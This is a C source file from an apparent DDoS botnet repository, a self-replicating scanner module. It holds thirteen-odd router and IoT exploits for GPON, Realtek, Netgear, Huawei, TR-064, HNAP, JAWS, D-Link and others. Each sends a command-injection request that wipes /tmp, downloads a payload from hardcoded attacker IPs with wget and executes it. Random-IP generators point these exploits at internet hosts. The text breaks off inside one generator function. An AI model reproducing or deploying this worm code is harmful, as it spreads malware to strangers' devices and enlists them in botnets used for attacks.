Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Self Reps/MULTI SELFREP/13exploit1selfrepFIXED.c
5038 views
1
#ifdef SELFREP

2
#define _GNU_SOURCE

3
//BY ROOTSEC

4
#ifdef DEBUG

5
    #include <stdio.h>

6
#endif

7


8
#include <stdlib.h> 

9
#include <stdarg.h>

10
#include <stdio.h>

11
#include <sys/socket.h>

12
#include <sys/types.h>

13
#include <netinet/in.h>

14
#include <arpa/inet.h>

15
#include <netdb.h>

16
#include <signal.h>

17
#include <strings.h>

18
#include <string.h>

19
#include <sys/utsname.h>

20
#include <unistd.h>

21
#include <fcntl.h>

22
#include <errno.h>

23
#include <netinet/udp.h>

24
#include <netinet/tcp.h>

25
#include <sys/wait.h>

26
#include <sys/ioctl.h>

27
#include <net/if.h>

28


29
#include "includes.h"

30
#include "table.h"

31
#include "rand.h"

32
#include "util.h"

33
#include "checksum.h"

34
#include "resolv.h"

35
#include "scanner.h"

36
//13 EXPLOIT SELFREP SCANNER

37
int GPON1_Range [] = {187,189,200,201,207};

38
int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};

39
//int NETIS_Range [] = {1,14,27,36,39,40,42,47,49,58,59,60,61,62,94,101,103,104,106,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,139,140,144,150,153,163,171,175,180,182,183,193,202,203,210,211,216,218,219,220,221,222,223};

40


41
int scanner_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;

42
static uint8_t ipState[40] = {0};

43
int max = 0, i = 0;

44


45
int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests

46
{	

47
	struct hostent *hp;

48
	struct sockaddr_in addr;

49
	int on = 1, sock;     

50
    struct timeval timeout;     

51
    timeout.tv_sec = 3; // 3 sec timeout on socket

52
    timeout.tv_usec = 0;

53
	if ((hp = gethostbyname(host)) == NULL) return 0;

54
	bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);

55
	addr.sin_port = htons(port);

56
	addr.sin_family = AF_INET;

57
	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

58
	setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));

59
	if (sock == -1) return 0;

60
	if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;

61
	return sock;

62
}

63


64
int socket_connect_udp(char *host, in_port_t port) // udp socket for netis explotation

65
{	

66
}

67


68
void exploit_socket_gpon8080(unsigned char *host)

69
{

70
    scanner3_pid = fork();

71
	

72
    if (scanner3_pid > 0 || scanner3_pid == -1)

73
        return;	

74


75
	int gpon_socket1;

76
	char gpon_request1[1024];

77
	

78
	gpon_socket1 = socket_connect_tcp((char *)host, 8080);

79
	

80
	sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://176.32.33.88/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");

81
	

82
	if (gpon_socket1 != 0) 

83
	{

84
		write(gpon_socket1, gpon_request1, strlen(gpon_request1));

85
		usleep(200000);

86
		close(gpon_socket1);

87
		#ifdef DEBUG

88
			printf("[gpon_8080] exploitable %s\n", host);

89
		#endif

90
	}

91
	exit(0);

92
}

93


94
void exploit_socket_gpon80(unsigned char *host)

95
{

96
    scanner4_pid = fork();

97
	

98
    if (scanner4_pid > 0 || scanner4_pid == -1)

99
        return;	

100


101
	int gpon_socket2;

102
	char gpon_request2[1024];

103
	

104
	gpon_socket2 = socket_connect_tcp((char *)host, 80);

105
	

106
	sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://176.32.33.88/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");

107
	

108
	if (gpon_socket2 != 0) 

109
	{

110
		write(gpon_socket2, gpon_request2, strlen(gpon_request2));

111
		usleep(200000);

112
		close(gpon_socket2);

113
		#ifdef DEBUG

114
			printf("[gpon_80] exploitable %s\n", host);

115
		#endif

116
	}

117
	exit(0);

118
}

119


120
void exploit_socket_realtek(unsigned char *host)

121
{

122
    scanner5_pid = fork();

123
	

124
    if (scanner5_pid > 0 || scanner5_pid == -1)

125
        return;	

126


127
	int realtek_socket;

128
	char realtek_request[1024], realtek_request2[1024];

129
	

130
	realtek_socket = socket_connect_tcp((char *)host, 52869);

131
	

132
	sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);

133
	sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x realtek;./realtek realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);

134
	

135
	if (realtek_socket != 0) 

136
	{

137
		write(realtek_socket, realtek_request, strlen(realtek_request));

138
		sleep(5);

139
		write(realtek_socket, realtek_request2, strlen(realtek_request2));

140
		usleep(200000);

141
		close(realtek_socket);

142
		#ifdef DEBUG

143
			printf("[realtek] exploitable %s\n", host);

144
		#endif

145
	}

146
	exit(0);

147
}

148


149
void exploit_socket_netgear(unsigned char *host)

150
{

151
    scanner6_pid = fork();

152
	

153
    if (scanner6_pid > 0 || scanner6_pid == -1)

154
        return;	

155


156
	int netgear_socket, netgear_socket2;

157
	char netgear_request[1024];

158
	

159
	netgear_socket = socket_connect_tcp((char *)host, 8080);

160
	netgear_socket2 = socket_connect_tcp((char *)host, 80);

161
	

162
	sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://176.32.33.88/netgear+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n");

163


164
	if (netgear_socket != 0) 

165
	{

166
		write(netgear_socket, netgear_request, strlen(netgear_request));

167
		usleep(200000);

168
		close(netgear_socket);

169
		#ifdef DEBUG

170
			printf("[netgear_8080] exploitable %s\n", host);

171
		#endif

172
	}

173
	if (netgear_socket2 != 0) 

174
	{

175
		write(netgear_socket2, netgear_request, strlen(netgear_request));

176
		usleep(200000);

177
		close(netgear_socket2);

178
		#ifdef DEBUG

179
			printf("[netgear_80] exploitable %s\n", host);

180
		#endif

181
	}

182
	exit(0);

183
}

184


185
void exploit_socket_huawei(unsigned char *host)

186
{

187
    scanner6_pid = fork();

188
	

189
    if (scanner6_pid > 0 || scanner6_pid == -1)

190
        return;	

191


192
	int huawei_socket;

193
	char huawei_request[1024];

194
	

195
	huawei_socket = socket_connect_tcp((char *)host, 37215);

196
	

197
	sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 176.32.33.88 -l /tmp/huawei -r /huawei; sh /tmp/huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);

198
	

199
	if (huawei_socket != 0) 

200
	{

201
		write(huawei_socket, huawei_request, strlen(huawei_request));

202
		usleep(200000);

203
		close(huawei_socket);

204
		#ifdef DEBUG

205
			printf("[huawei] exploitable %s\n", host);

206
		#endif

207
	}

208
	exit(0);

209
}

210


211
void exploit_socket_tr064(unsigned char *host)

212
{

213
    scanner7_pid = fork();

214
	

215
    if (scanner7_pid > 0 || scanner7_pid == -1)

216
        return;	

217


218
	int tr064_socket, tr064_socket2;

219
	char tr064_request[1024], tr064_request2[1024];

220
	

221
	tr064_socket = socket_connect_tcp((char *)host, 7574);

222
	tr064_socket2 = socket_connect_tcp((char *)host, 5555);

223
	

224
	sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: r00ts3c-owned-you\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.32.33.88/tr064 && sh /tmp/tr064`</NewNTPServer1><NewNTPServer2>`echo OMNI`</NewNTPServer2><NewNTPServer3>`echo OMNI`</NewNTPServer3><NewNTPServer4>`echo OMNI`</NewNTPServer4><NewNTPServer5>`echo OMNI`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>", host);

225
	sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: r00ts3c-owned-you\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.32.33.88/tr064 && sh /tmp/tr064`</NewNTPServer1><NewNTPServer2>`echo OMNI`</NewNTPServer2><NewNTPServer3>`echo OMNI`</NewNTPServer3><NewNTPServer4>`echo OMNI`</NewNTPServer4><NewNTPServer5>`echo OMNI`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>", host);

226
	

227
	if (tr064_socket != 0) 

228
	{

229
		write(tr064_socket, tr064_request, strlen(tr064_request));

230
		usleep(200000);

231
		close(tr064_socket);

232
		#ifdef DEBUG

233
			printf("[tr064_7574] exploitable %s\n", host);

234
		#endif

235
	}

236
	if (tr064_socket2 != 0) 

237
	{

238
		write(tr064_socket2, tr064_request2, strlen(tr064_request2));

239
		usleep(200000);

240
		close(tr064_socket2);

241
		#ifdef DEBUG

242
			printf("[tr064_5555] exploitable %s\n", host);

243
		#endif

244
	}

245
	exit(0);

246
}

247


248
void exploit_socket_hnap(unsigned char *host)

249
{

250
    scanner8_pid = fork();

251
	

252
    if (scanner8_pid > 0 || scanner8_pid == -1)

253
        return;	

254


255
	int hnap_socket;

256
	char hnap_request[1024];

257
	

258
	hnap_socket = socket_connect_tcp((char *)host, 80);

259
	

260
	sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://176.32.33.88/hnap && sh /tmp/hnap`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);

261


262
	if (hnap_socket != 0) 

263
	{

264
		write(hnap_socket, hnap_request, strlen(hnap_request));

265
		usleep(200000);

266
		close(hnap_socket);

267
		#ifdef DEBUG

268
			printf("[hnap] exploitable %s\n", host);

269
		#endif

270
	}

271
	exit(0);

272
}

273


274
void exploit_socket_crossweb(unsigned char *host)

275
{

276
    scanner9_pid = fork();

277
	

278
    if (scanner9_pid > 0 || scanner9_pid == -1)

279
        return;	

280


281
	int crossweb_socket;

282
	char crossweb_request[1024];

283
	

284
	crossweb_socket = socket_connect_tcp((char *)host, 81);

285
	

286
	sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://176.32.33.88/crossweb;sh${IFS}/tmp/crossweb&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");

287


288
	if (crossweb_socket != 0) 

289
	{

290
		write(crossweb_socket, crossweb_request, strlen(crossweb_request));

291
		usleep(200000);

292
		close(crossweb_socket);

293
		#ifdef DEBUG

294
			printf("[crossweb] exploitable %s\n", host);

295
		#endif

296
	}

297
	exit(0);

298
}

299


300
void exploit_socket_jaws(unsigned char *host)

301
{

302
    scanner10_pid = fork();

303
	

304
    if (scanner10_pid > 0 || scanner10_pid == -1)

305
        return;	

306


307
	int jaws_socket;

308
	char jaws_request[1024];

309
	

310
	jaws_socket = socket_connect_tcp((char *)host, 80);

311
	

312
	sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/jaws;sh+/tmp/jaws HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);

313


314
	if (jaws_socket != 0) 

315
	{

316
		write(jaws_socket, jaws_request, strlen(jaws_request));

317
		usleep(200000);

318
		close(jaws_socket);

319
		#ifdef DEBUG

320
			printf("[jaws] exploitable %s\n", host);

321
		#endif

322
	}

323
	exit(0);

324
}

325


326
void exploit_socket_dlink(unsigned char *host)

327
{

328
    scanner11_pid = fork();

329
	

330
    if (scanner11_pid > 0 || scanner11_pid == -1)

331
        return;	

332


333
	int dlink_socket;

334
	char dlink_request[1024];

335
	

336
	dlink_socket = socket_connect_tcp((char *)host, 49152);

337
	

338
	sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://176.32.33.88/dlink;sh /tmp/dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);

339


340
	if (dlink_socket != 0) 

341
	{

342
		write(dlink_socket, dlink_request, strlen(dlink_request));

343
		usleep(200000);

344
		close(dlink_socket);

345
		#ifdef DEBUG

346
			printf("[dlink] exploitable %s\n", host);

347
		#endif

348
	}

349
	exit(0);

350
}

351


352
void exploit_socket_r7064(unsigned char *host)

353
{

354
    scanner12_pid = fork();

355
	

356
    if (scanner12_pid > 0 || scanner12_pid == -1)

357
        return;	

358


359
	int r7064_socket;

360
	char r7064_request[1024];

361
	

362
	r7064_socket = socket_connect_tcp((char *)host, 8443);

363
	

364
	sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.32.33.88/netgear2;${IFS}sh${IFS}/var/tmp/netgear2");

365


366
	if (r7064_socket != 0) 

367
	{

368
		write(r7064_socket, r7064_request, strlen(r7064_request));

369
		usleep(200000);

370
		close(r7064_socket);

371
		#ifdef DEBUG

372
			printf("[r7064] exploitable %s\n", host);

373
		#endif

374
	}

375
	exit(0);

376
}

377


378
void exploit_socket_vacron(unsigned char *host)

379
{

380
    scanner13_pid = fork();

381
	

382
    if (scanner13_pid > 0 || scanner13_pid == -1)

383
        return;	

384


385
	int vacron_socket;

386
	char vacron_request[1024];

387
	

388
	vacron_socket = socket_connect_tcp((char *)host, 8080);

389
	

390
	sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/vacron;sh+/tmp/vacron");

391


392
	if (vacron_socket != 0) 

393
	{

394
		write(vacron_socket, vacron_request, strlen(vacron_request));

395
		usleep(200000);

396
		close(vacron_socket);

397
		#ifdef DEBUG

398
			printf("[vacron] exploitable %s\n", host);

399
		#endif

400
	}

401
	exit(0);

402
}

403


404
void exploit_socket_awsec2(unsigned char *host)

405
{

406
    scanner13_pid = fork();

407
	

408
    if (scanner13_pid > 0 || scanner13_pid == -1)

409
        return;	

410


411
	int awsec2_socket;

412
	char awsec2_request[1024];

413
	

414
	awsec2_socket = socket_connect_tcp((char *)host, 8080);

415
	

416
	sprintf(awsec2_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/awsec2;sh+/tmp/awsec2");

417


418
	if (awsec2_socket != 0) 

419
	{

420
		write(awsec2_socket, awsec2_request, strlen(vacron_request));

421
		usleep(200000);

422
		close(awsec2_socket);

423
		#ifdef DEBUG

424
			printf("[awsec2] exploitable %s\n", host);

425
		#endif

426
	}

427
	exit(0);

428
}

429


430
void GPON8080_IPGen()

431
{

432
	char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};

433
	char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};

434
	

435
	srand(time(NULL));

436
	int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));

437
	int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));

438
	

439
	ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];

440
	ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];

441
	ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;

442
	ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;

443
	ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

444
	

445
	sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);

446
	sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);

447
	sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

448
	

449
	exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);

450
}

451


452
void GPON80_IPGen()

453
{

454
	char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};

455
	char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};

456
	

457
	srand(time(NULL));

458
	int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));

459
	int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));

460
	

461
	ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];

462
	ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];

463
	ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;

464
	ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;

465
	ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

466
	

467
	sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);

468
	sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);

469
	sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

470
	

471
	exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);

472
}

473


474
void REALTEK_IPGen()

475
{	

476
	char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};

477
	char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};

478


479
	srand(time(NULL));

480
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;

481
	ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;

482
	ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;

483
	ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;

484
	ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;

485
	ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;

486
	ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;

487
	ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

488
	

489
	sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);

490
	sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);

491
	sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

492
	sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);

493
	sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

494
	

495
	exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);

496
	exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);

497
}

498


499
void NETGEAR_IPGen()

500
{	

501
	char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};

502
	char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};

503


504
	srand(time(NULL));

505
	ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;

506
	ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;

507
	ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;

508
	ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;

509
